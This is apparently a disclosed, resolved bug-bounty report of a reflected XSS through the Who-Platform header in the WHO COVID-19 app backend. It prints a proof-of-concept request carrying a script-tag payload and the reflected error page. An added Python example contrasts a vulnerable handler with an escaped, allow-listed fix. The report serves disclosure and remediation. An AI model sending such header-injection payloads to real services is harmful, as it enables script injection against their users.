Probably unexploitable XSS via Header Injection
Low
WHO COVID-19 Mobile App
Team Summary
Official summary from WHO COVID-19 Mobile App
The Who-Platform header is reflected in the output of the page if it's not one of the recognized Who-Platform values (IOS, ANDROID, WEB). While this is probably no longer exploitable (as of ~2015), it may be exploitable on less well implemented browsers (not Chrome/Firefox/Edge). In general, though, this is bad form and should probably be corrected. Fixed with: https://github.com/WorldHealthOrganization/app/pull/855
Reported by
d0nut
Vulnerability Details
Technical details and impact analysis
## Summary:
The `Who-Platform` header is reflected in the output of the page if it's not one of the recognized `Who-Platform` values (IOS, ANDROID, WEB).
While this is probably no longer exploitable (as of ~2015), it may be exploitable on less well implemented browsers (not Chrome/Firefox/Edge). In general, though, this is bad form and should probably be corrected.
## Steps To Reproduce:
Send the following to `hackerone.whocoronavirus.org`
```http
POST /WhoService/getCaseStats HTTP/1.1
Host: hackerone.whocoronavirus.org
Who-Client-ID: ██████
Who-Platform: test1<script>alert(1)</script>
Content-Length: 0

```
Observe the response containing an XSS payload.
```http
HTTP/1.1 400 Bad Request
Content-Type: text/html;charset=utf-8
X-Cloud-Trace-Context: 587c4577619ec099323490092d00ca47;o=1
Date: Wed, 01 Apr 2020 04:14:02 GMT
Server: Google Frontend
Content-Length: 302

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>400 Unsupported Who-Platform header: test1<script>alert(1)</script></title>
</head>
<body text=#000000 bgcolor=#ffffff>
<h1>Error: Unsupported Who-Platform header: test1<script>alert(1)</script></h1>
</body></html>
```
Exploitation of this kind of XSS vector *_was_* possible using flash but somewhat recently a security upgrade prevented flash from being able to set arbitrary custom headers in cross origin POST requests.
## Supporting Material/References:
██████████
## Impact
Very very limited XSS.
This probably more so falls in the "Media could be a stickler about this" category, but it also could affect real-world participants on out-of-date browsers or out-of-date versions of Flash.
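The defect above is a classic case of an error page interpolating a request header into HTML without encoding. The following is an added example, not code from the WHO app repository or from the linked pull request (whose actual change is not reproduced here): a minimal handler that mirrors the reported behaviour, the hardened form that validates the header against the allow-list named in the report and HTML-escapes (or omits) anything it echoes, and a small check that a reviewer or test suite can run to confirm the untrusted value no longer appears verbatim in the response body. Function names, the allow-list tuple and the sample headers are assumptions constructed for the example.

```python
"""Reflected-header error page: vulnerable vs. hardened (added example).

Assumptions (not the WHO service's real code): the endpoint validates a
Who-Platform request header against an allow-list and answers 400 for
anything else. vulnerable_handler mirrors the report by interpolating the
raw header value into an HTML error page; hardened_handler keeps the error
text generic and HTML-escapes the value if it is echoed at all.
"""
import html

ALLOWED_PLATFORMS = ("IOS", "ANDROID", "WEB")  # values named in the report

# Same shape as the error page shown in the report (constructed template)
ERROR_TEMPLATE = (
    "<html><head>\n"
    '<meta http-equiv="content-type" content="text/html;charset=utf-8">\n'
    "<title>400 {msg}</title>\n"
    "</head>\n"
    "<body text=#000000 bgcolor=#ffffff>\n"
    "<h1>Error: {msg}</h1>\n"
    "</body></html>\n"
)


def vulnerable_handler(headers: dict) -> tuple:
    """Reported behaviour: the raw header value lands inside <title> and <h1>."""
    platform = headers.get("Who-Platform", "")
    if platform in ALLOWED_PLATFORMS:
        return 200, '{"status":"ok"}'
    msg = f"Unsupported Who-Platform header: {platform}"  # no escaping
    return 400, ERROR_TEMPLATE.format(msg=msg)


def hardened_handler(headers: dict, echo_value: bool = False) -> tuple:
    """Validates the header and never emits untrusted bytes unescaped.

    The default error is generic, which removes the reflection entirely.
    If echo_value is True (useful for debugging), the value is truncated
    and HTML-escaped so it stays a text node and cannot open a tag.
    """
    platform = headers.get("Who-Platform", "")
    if platform in ALLOWED_PLATFORMS:
        return 200, '{"status":"ok"}'
    msg = "Unsupported Who-Platform header"
    if echo_value:
        msg += ": " + html.escape(platform[:64], quote=True)
    return 400, ERROR_TEMPLATE.format(msg=msg)


def reflects_unescaped(body: str, value: str) -> bool:
    """Check used in review/tests: True if the untrusted value appears
    verbatim (not entity-encoded) in an HTML response body."""
    return value in body


# Constructed request using the probe value from the report
SAMPLE_HEADERS = {
    "Who-Client-ID": "<redacted>",
    "Who-Platform": "test1<script>alert(1)</script>",
}

if __name__ == "__main__":
    probe = SAMPLE_HEADERS["Who-Platform"]
    status, body = vulnerable_handler(SAMPLE_HEADERS)
    print("vulnerable:", status, "reflected verbatim:", reflects_unescaped(body, probe))
    status, body = hardened_handler(SAMPLE_HEADERS, echo_value=True)
    print("hardened:  ", status, "reflected verbatim:", reflects_unescaped(body, probe))
    print(body)
```

The generic-message variant is the better default: a 400 for an unknown platform does not need to tell the client what it sent, and not echoing the value removes the sink altogether rather than relying on the encoder being applied at every call site.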
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
Cross-site Scripting (XSS) - Reflected